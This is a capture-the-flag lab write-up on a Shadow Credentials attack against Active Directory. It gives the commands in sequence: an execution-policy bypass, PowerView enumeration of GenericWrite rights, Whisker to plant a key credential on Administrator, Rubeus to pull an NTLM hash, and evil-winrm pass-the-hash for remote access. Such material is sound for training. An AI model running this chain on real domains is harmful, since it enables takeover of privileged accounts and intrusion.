Day 11
Active Directory Jingle Bells, Shadow Spells
Learning Objectives
Understanding Active Directory
Introduction to Windows Hello for Business
Prerequisites for exploiting GenericWrite privilege
How the Shadow Credentials attack works
How to exploit the vulnerability
Active Directory 101
Active Directory (AD) is a system mainly used by businesses in Windows environments. It's a centralised authentication system. The Domain Controller (DC) is at the heart of AD and typically manages data storage, authentication, and authorisation within a domain.
This room is straightforward will all the commands and instructions given to us.
As instructed we first execute the following command in powershell as part of our enumeration.
cd C:\Users\hr\Desktop #moves to the folder containing all the exploitation tools.
powershell -ep bypass #will bypass the default policy for arbitrary PowerShell script execution.
. .\PowerView.ps1 #loads the PowerView script into the memory.
We then execute this command.
Find-InterestingDomainAcl -ResolveGuids | Where-Object { $_.IdentityReferenceName -eq "hr" } | Select-Object IdentityReferenceName, ObjectDN, ActiveDirectoryRights

We can now procced with the exploit.
As instructed we use the tool Whisker.
Whisker a C# utility created by Elad Shamir. Using Whisker is straightforward: once we have a vulnerable user, we can run the add command from Whisker to simulate the enrollment of a malicious device, updating the msDS-KeyCredentialLink attribute.
This task can be accomplished by running the following command:
.\Whisker.exe add /target:Administrator
In our case, we'll have to replace the /target
parameter with the one from the enumeration step executed inside our VM.
The tool will conveniently provide the certificate necessary to authenticate the impersonation of the vulnerable user with a command ready to be launched using Rubeus.
Rubeus
is a C# toolset designed for direct Kerberos interaction and exploitation, was developed by SpecterOps. a pass-the-hash attack!
The next command will be
.\Rubeus.exe asktgt <#COPY THIS PORTION FROM THE OUTPUT OF WHISKER#>
This will give us an NTLM hash which we can use Evil-WinRM
, a tool for remotely managing Windows systems abusing the Windows Remote Management (WinRM) protocol.
evil-winrm -i 'IP_MACHINE' -u 'USERNAME' -H 'NTLM_HASH'

This will gives us remote access and we can proceed with answering the questions.
What is the hash of the vulnerable user?
[REDACTED]
This can be found in the output for Rubeus
What is the content of flag.txt on the Administrator Desktop?
[REDACTED]

Last updated
Was this helpful?